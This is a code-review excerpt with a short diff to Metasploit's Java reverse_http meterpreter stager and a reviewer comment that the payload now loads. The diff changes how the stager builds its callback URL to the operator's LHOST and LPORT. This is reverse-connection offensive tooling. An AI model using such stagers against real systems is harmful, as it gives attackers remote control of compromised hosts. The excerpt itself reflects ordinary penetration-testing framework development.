modules/payloads/stagers/java/reverse_http.rb

```diff
@@ -53,8 +53,8 @@ def config
     c << "Spawn=#{spawn}\n"
     c << "URL=http://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    c << "/"
-    c << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
+    c << "#{luri}"
+    c << generate_uri_checksum(:init_java, uri_req_len)
```

Comment:
That explains that then. `use payload/java/meterpreter/reverse_http` loads fine, cheers!

I can't test the actual payload right now, but at least it can be `use`d.